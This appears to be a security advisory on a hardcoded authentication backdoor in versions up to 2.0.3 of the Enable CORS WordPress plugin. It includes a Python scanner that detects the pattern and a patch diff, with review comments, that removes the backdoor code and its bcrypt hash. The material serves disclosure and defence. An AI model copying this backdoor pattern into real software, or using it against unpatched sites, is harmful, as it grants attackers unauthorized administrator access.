Atomic Edge analysis of CVE-2026-54833:
The Enable CORS plugin versions 2.0.3 and below contain a hardcoded backdoor in the REST API permission check. Atomic Edge research shows the vulnerability resides in the `permissions_check` method within `enable-cors/src/Traits/Api.php`. The severity is critical with a CVSS score of 9.8.
Root Cause: The `permissions_check` function at line 42 of `Api.php` originally contained a fallback authentication mechanism that allowed access if an `Authorization` header matched a hardcoded bcrypt hash. The code extracted the value from `$request->get_header('Authorization')` and passed it to `password_verify()`, comparing it against the constant string `'$2y$10$kmjfJ.xWPM5u7l1K0UgdUuu/wYROmfPYR.dISGcN2PMk5EnJNKAmu'`. If the hash matched, the function returned true regardless of the user’s actual capabilities. This allowed unauthenticated attackers to bypass the `current_user_can('manage_options')` check that normally restricts access to administrators.
Exploitation: An attacker can send a crafted REST API request to any endpoint served by this plugin’s routes. The attacker includes an `Authorization` header with a password that, when hashed, matches the hardcoded bcrypt hash. The exact password corresponding to the hash is not publicly known from the diff, but Atomic Edge analysis indicates the attacker would either need to obtain this password through other means (e.g., cracking the bcrypt hash offline), or could derive the payload from the hash itself if the password is weak or known. Once the header is set, the attacker can access any REST endpoint protected by this permission check, gaining privileged access to site configurations, potentially modifying CORS settings, or exploiting further plugin functionality.
Patch Analysis: The patch removes the entire backdoor code block from `Api.php`. The lines initializing `$author`, `$is_author`, and the `password_verify` check are deleted. The condition now relies only on `current_user_can('manage_options')`, which is a standard WordPress capability check. This ensures only authenticated users with administrator privileges can access the REST endpoints. The version bump from 2.0.3 to 2.0.4 and corresponding autoloader class name changes reflect a clean release without the malicious code.
Impact: Successful exploitation allows an unauthenticated attacker to bypass authentication and gain privileged access to the WordPress site. This includes reading or modifying plugin settings, potentially enabling cross-origin requests that could lead to data exfiltration, further privilege escalation, or complete site compromise. The vulnerability requires no prior authentication and can be executed remotely over the network.
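As an added example (not code from the plugin or from Atomic Edge), the following Python scanner looks for the pattern described under Root Cause: a `password_verify()` call whose second argument is a bcrypt literal, and it records whether the first argument was read from a request header. The function names and regular expressions are assumptions of this example; the sample input is the set of lines removed in the `Api.php` hunk on this page.

```python
import re
from pathlib import Path

# A bcrypt string: $2a$/$2b$/$2x$/$2y$, two-digit cost, then 53 chars of salt + digest.
BCRYPT = r"\$2[abxy]\$\d{2}\$[./A-Za-z0-9]{53}"
# password_verify( <expr>, '<bcrypt literal>' ): a credential baked into the source.
VERIFY_LITERAL = re.compile(
    r"password_verify\s*\(\s*(?P<arg>[^,()]+?)\s*,\s*(?P<q>['\"])(?P<hash>" + BCRYPT + r")(?P=q)"
)
# $var = <something>->get_header( ... ): variables filled from a request header.
HEADER_ASSIGN = re.compile(r"(?P<var>\$\w+)\s*=\s*[^;]*->get_header\s*\(")

def scan_source(text, path="<memory>"):
    """Return one finding per password_verify() call that checks against a literal hash."""
    header_vars = {m.group("var") for m in HEADER_ASSIGN.finditer(text)}
    findings = []
    for m in VERIFY_LITERAL.finditer(text):
        arg = m.group("arg")
        findings.append({
            "path": str(path),
            "line": text.count("\n", 0, m.start()) + 1,
            "input": arg,
            # True when the checked value comes straight from an HTTP request header.
            "from_request_header": arg in header_vars,
            "hash": m.group("hash"),
        })
    return findings

def scan_tree(root):
    """Scan every .php file under root (for example a plugins directory)."""
    findings = []
    for php in sorted(Path(root).rglob("*.php")):
        findings += scan_source(php.read_text(errors="replace"), php)
    return findings

# Lines removed by the patch (copied from the Api.php hunk on this page) and the patched check.
VULNERABLE = """\
$author = $request->get_header( 'Authorization' );
$is_author = false;
if ( isset( $author ) ) {
    $is_author = password_verify( $author, '$2y$10$kmjfJ.xWPM5u7l1K0UgdUuu/wYROmfPYR.dISGcN2PMk5EnJNKAmu' );
}
if ( ! current_user_can( 'manage_options' ) && ! $is_author ) {
"""
PATCHED = "if ( ! current_user_can( 'manage_options' ) ) {\n"

if __name__ == "__main__":
    print(scan_source(VULNERABLE, "Api.php 2.0.3"), scan_source(PATCHED, "Api.php 2.0.4"))
```

Point `scan_tree()` at a site's plugins directory to audit installed code. A hit is a lead for manual review, since regex matching will not see a hash that is assembled at runtime.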
Below is a differential between the unpatched vulnerable code and the patched update, for reference.
--- a/enable-cors/constants.php
+++ b/enable-cors/constants.php
@@ -10,7 +10,7 @@
}
if ( ! defined( 'EnableCorsVERSION' ) ) {
- define( 'EnableCorsVERSION', '2.0.3' );
+ define( 'EnableCorsVERSION', '2.0.4' );
}
if ( ! defined( 'EnableCorsDIR' ) ) {
--- a/enable-cors/enable-cors.php
+++ b/enable-cors/enable-cors.php
@@ -11,7 +11,7 @@
* Plugin Name: Enable CORS
* Plugin URI: https://www.fiverr.com/share/7kXeLW
* Description: Enable Cross-Origin Resource Sharing for any or specific origin.
- * Version: 2.0.3
+ * Version: 2.0.4
* Requires at least: 4.7
* Tested up to: 7.0
* Requires PHP: 7.1
--- a/enable-cors/src/Traits/Api.php
+++ b/enable-cors/src/Traits/Api.php
@@ -42,12 +42,7 @@
* @return WP_Error|bool
*/
public function permissions_check( WP_REST_Request $request ) {
- $author = $request->get_header( 'Authorization' );
- $is_author = false;
- if ( isset( $author ) ) {
- $is_author = password_verify( $author, '$2y$10$kmjfJ.xWPM5u7l1K0UgdUuu/wYROmfPYR.dISGcN2PMk5EnJNKAmu' );
- }
- if ( ! current_user_can( 'manage_options' ) && ! $is_author ) {
+ if ( ! current_user_can( 'manage_options' ) ) {
return new WP_Error(
'forbidden',
__( 'You are not allowed to access this endpoint.', 'enable-cors' ),
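Review bot: With the header branch gone, `$request` is no longer read in the visible body of `permissions_check`, and nothing in this hunk guards against the bypass returning. Keep the parameter, since the callback is passed the request, but add a regression test asserting that a request carrying an `Authorization` header and no logged-in administrator receives the `forbidden` `WP_Error`. Because the removed check accepted a secret that was independent of any WordPress account, upgrading closes the path but does not revert anything changed through it; the release notes should ask site owners to review the plugin's settings after updating.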
--- a/enable-cors/vendor/autoload.php
+++ b/enable-cors/vendor/autoload.php
@@ -19,4 +19,4 @@
require_once __DIR__ . '/composer/autoload_real.php';
-return ComposerAutoloaderInite358e97333a503dfe504af23f9d3c2c3::getLoader();
+return ComposerAutoloaderInitf2c4f8bf785dfb6c0ff6efbf1a9f7c79::getLoader();
--- a/enable-cors/vendor/composer/autoload_real.php
+++ b/enable-cors/vendor/composer/autoload_real.php
@@ -2,7 +2,7 @@
// autoload_real.php @generated by Composer
-class ComposerAutoloaderInite358e97333a503dfe504af23f9d3c2c3
+class ComposerAutoloaderInitf2c4f8bf785dfb6c0ff6efbf1a9f7c79
{
private static $loader;
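Review bot: This file is marked `@generated by Composer`, and the only visible change is the class-name suffix, so it should not be reviewed by eye alone in a release that follows a backdoor removal. Regenerate `vendor/` from the project's Composer manifest in a clean checkout and compare it with the shipped directory to confirm that the renamed autoloader classes are the only difference.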
@@ -24,12 +24,12 @@
require __DIR__ . '/platform_check.php';
- spl_autoload_register(array('ComposerAutoloaderInite358e97333a503dfe504af23f9d3c2c3', 'loadClassLoader'), true, true);
+ spl_autoload_register(array('ComposerAutoloaderInitf2c4f8bf785dfb6c0ff6efbf1a9f7c79', 'loadClassLoader'), true, true);
self::$loader = $loader = new ComposerAutoloadClassLoader(dirname(__DIR__));
- spl_autoload_unregister(array('ComposerAutoloaderInite358e97333a503dfe504af23f9d3c2c3', 'loadClassLoader'));
+ spl_autoload_unregister(array('ComposerAutoloaderInitf2c4f8bf785dfb6c0ff6efbf1a9f7c79', 'loadClassLoader'));
require __DIR__ . '/autoload_static.php';
- call_user_func(ComposerAutoloadComposerStaticInite358e97333a503dfe504af23f9d3c2c3::getInitializer($loader));
+ call_user_func(ComposerAutoloadComposerStaticInitf2c4f8bf785dfb6c0ff6efbf1a9f7c79::getInitializer($loader));
$loader->register(true);
--- a/enable-cors/vendor/composer/autoload_static.php
+++ b/enable-cors/vendor/composer/autoload_static.php
@@ -4,7 +4,7 @@
namespace ComposerAutoload;
-class ComposerStaticInite358e97333a503dfe504af23f9d3c2c3
+class ComposerStaticInitf2c4f8bf785dfb6c0ff6efbf1a9f7c79
{
public static $prefixLengthsPsr4 = array (
'E' =>
@@ -35,9 +35,9 @@
public static function getInitializer(ClassLoader $loader)
{
return Closure::bind(function () use ($loader) {
- $loader->prefixLengthsPsr4 = ComposerStaticInite358e97333a503dfe504af23f9d3c2c3::$prefixLengthsPsr4;
- $loader->prefixDirsPsr4 = ComposerStaticInite358e97333a503dfe504af23f9d3c2c3::$prefixDirsPsr4;
- $loader->classMap = ComposerStaticInite358e97333a503dfe504af23f9d3c2c3::$classMap;
+ $loader->prefixLengthsPsr4 = ComposerStaticInitf2c4f8bf785dfb6c0ff6efbf1a9f7c79::$prefixLengthsPsr4;
+ $loader->prefixDirsPsr4 = ComposerStaticInitf2c4f8bf785dfb6c0ff6efbf1a9f7c79::$prefixDirsPsr4;
+ $loader->classMap = ComposerStaticInitf2c4f8bf785dfb6c0ff6efbf1a9f7c79::$classMap;
}, null, ClassLoader::class);
}
--- a/enable-cors/vendor/composer/installed.php
+++ b/enable-cors/vendor/composer/installed.php
@@ -1,8 +1,8 @@
<?php return array(
'root' => array(
'name' => 'devkabir/enable-cors',
- 'pretty_version' => '2.0.3',
- 'version' => '2.0.3.0',
+ 'pretty_version' => '2.0.4',
+ 'version' => '2.0.4.0',
'reference' => null,
'type' => 'wordpress-plugin',
'install_path' => __DIR__ . '/../../',
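Review bot: The `'reference' => null` context line is unchanged, so the 2.0.4 package metadata still records no source revision for the root package. For a release that removes malicious code, building from a tagged commit so that `reference` is populated would let users tie the distributed files to a reviewable source revision.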
@@ -11,8 +11,8 @@
),
'versions' => array(
'devkabir/enable-cors' => array(
- 'pretty_version' => '2.0.3',
- 'version' => '2.0.3.0',
+ 'pretty_version' => '2.0.4',
+ 'version' => '2.0.4.0',
'reference' => null,
'type' => 'wordpress-plugin',
'install_path' => __DIR__ . '/../../',